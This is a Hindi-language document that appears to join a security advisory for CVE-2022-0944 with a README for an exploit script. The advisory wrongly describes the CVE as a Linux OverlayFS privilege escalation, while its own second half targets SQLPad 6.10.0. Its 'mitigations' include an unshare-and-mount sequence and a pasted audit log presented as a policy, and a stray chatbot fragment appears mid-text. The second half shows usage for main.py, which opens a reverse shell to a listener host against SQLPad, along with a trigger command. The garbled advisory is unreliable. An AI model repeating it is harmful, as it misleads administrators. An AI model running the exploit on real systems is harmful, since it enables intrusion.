
OverlayFS में Linux कर्नेल की विशेषाधिकार उन्नयन भेद्यता के लिए सुरक्षा सलाह और शमन मार्गदर्शिका।
CVE-2022-0944 Linux कर्नेल के OverlayFS सबसिस्टम में एक सुरक्षा भेद्यता है जो स्थानीय हमलावरों को विशिष्ट कॉन्फ़िगरेशन में फ़ाइल निर्माण के अनुचित हैंडलिंग के माध्यम से विशेषाधिकार बढ़ाने की अनुमति देती है।

🚨 प्रभाव
एक स्थानीय हमलावर निम्न कार्य कर सकता है:
निर्मित फ़ाइल संचालनों के माध्यम से रूट विशेषाधिकार प्राप्त करना
सुरक्षा प्रतिबंधों को बायपास करना
संवेदनशील सिस्टम फ़ाइलों को संशोधित करना
संपूर्ण सिस्टम अखंडता से समझौता करना
🔍 पहचान
grep CVE-2022-0944 /var/log/apt/history.log
# RHEL/CentOS के लिए:
rpm -q --changelog kernel | grep CVE-2022-0944
4.🛡️ शमन
आधिकारिक पैच
इन पैच किए गए संस्करणों में से किसी एक में अपडेट करें:
Linux कर्नेल 5.16.12 या बाद का संस्करण
विक्रेता-विशिष्ट बैकपोर्टेड पैच
अपडेट कमांड:
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
sudo yum update kernel
वर्कअराउंड (यदि पैचिंग तत्काल न हो)
OverlayFS उपयोग प्रतिबंधित करें:
sudo modprobe -r overlay
नेमस्पेस प्रतिबंध लागू करें:
# अविशेषाधिकार प्राप्त उपयोगकर्ता नेमस्पेस बनाएँ
unshare -Ur
# उपयोगकर्ता प्रतिबंधों के साथ माउंट करें
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
SELinux/AppArmor नीतियाँ लागू करें: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
⚠️ अस्वीकरण यह दस्तावेज़ केवल सूचनात्मक उद्देश्यों के लिए प्रदान किया गया है। सटीकता सुनिश्चित करने के प्रयास किए गए हैं, कोई गारंटी प्रदान नहीं की जाती है। उत्पादन परिनियोजन से पहले हमेशा विकास वातावरण में पैच का परीक्षण करें।
अंतिम अपडेट: 2023-10-01 | परिवर्तन-लॉग देखें
मुख्य विशेषताएँ:
यह README प्रारूप निम्नलिखित के लिए उपयुक्त है:
क्या आप चाहेंगे कि मैं:
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
उदाहरण:
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों के लिए, विशेष रूप से साइबर सुरक्षा पाठ्यक्रमों और सीखने के वातावरण में उपयोग हेतु कोड और उपकरण प्रदान करती है। इस कोड के लेखक इस कोड के उपयोग, दुरुपयोग या संशोधन से उत्पन्न होने वाले किसी भी परिणाम के लिए कोई जिम्मेदारी नहीं लेते हैं। यह कोड बिना किसी वारंटी के "जैसा है" प्रदान किया गया है, चाहे वह स्पष्ट या निहित हो, जिसमें व्यापारिक योग्यता या किसी विशेष उद्देश्य के लिए उपयुक्तता की निहित वारंटियाँ शामिल हैं, लेकिन इन्हीं तक सीमित नहीं हैं।